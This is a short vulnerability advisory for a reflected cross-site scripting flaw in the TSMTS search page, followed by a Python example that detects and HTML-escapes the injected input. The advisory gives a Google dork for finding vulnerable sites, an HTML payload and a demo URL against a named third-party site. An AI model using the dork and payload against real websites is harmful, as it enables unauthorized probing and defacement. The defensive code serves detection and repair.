TSMTS XSS Vulnerability

2018-07-15 / 2018-07-29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title : TSMTS Cross-Site Scripting (XSS) Vulnerability
# Google Dork : intext:"TSMTS" inurl:?p=result-search
# Date : 15-17-2018
# Exploit Author : Rafin Rahman Chy
# Vendor Homepage : http://tsmts.com/
# Tested on : Windows 8
# CWE : 79

Proof of Concept :

1. Search with the dork on Google and select any website.
2. Use this payload <h1><marquee><u><i>XSS by Rafin</i></u></marquee></h1> or any other HTML element in the search form, then click on GO.
3. Demo http://cihs.edu.bd/?p=result-search&searchResult=<h1><marquee><u><i>XSS+by+Rafin<%2Fi><%2Fu><%2Fmarquee><%2Fh1>&term=1&submit=GO
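A defender-side view of the issue above, as an added example that is not part of the original advisory or the vendor's code: it flags result-search requests whose decoded searchResult value carries HTML tags, and shows the value HTML-encoded before it is echoed. The request targets are constructed samples, and render_unsafe/render_safe are hypothetical stand-ins for the page template, which the advisory does not show.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets (path + query only), modelled on the advisory's URL shape.
SAMPLE_REQUESTS = [
    "/?p=result-search&searchResult=12345&term=1&submit=GO",
    "/?p=result-search&searchResult=<h1><marquee><u><i>XSS+by+Rafin<%2Fi><%2Fu><%2Fmarquee><%2Fh1>&term=1&submit=GO",
    "/?p=result-search&searchResult=%3Cb%3Ebold%3C%2Fb%3E&term=2&submit=GO",
    "/?p=contact&searchResult=<i>x</i>",
]

# An opening or closing HTML tag in the already URL-decoded value.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def search_term(request_target):
    """Return the decoded searchResult value for result-search requests, else None."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if query.get("p") != ["result-search"]:
        return None
    return query.get("searchResult", [""])[0]

def flag_requests(requests):
    """Return the request targets whose decoded searchResult contains HTML tags."""
    flagged = []
    for target in requests:
        term = search_term(target)
        if term is not None and TAG_RE.search(term):
            flagged.append(target)
    return flagged

def render_unsafe(term):
    # Hypothetical template matching the reported behaviour: value echoed as-is.
    return "<p>Results for: " + term + "</p>"

def render_safe(term):
    # Same template with the value HTML-encoded, so tags display as text.
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"

if __name__ == "__main__":
    for target in flag_requests(SAMPLE_REQUESTS):
        print("suspicious:", target)
    print(render_safe(search_term(SAMPLE_REQUESTS[1])))
```
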

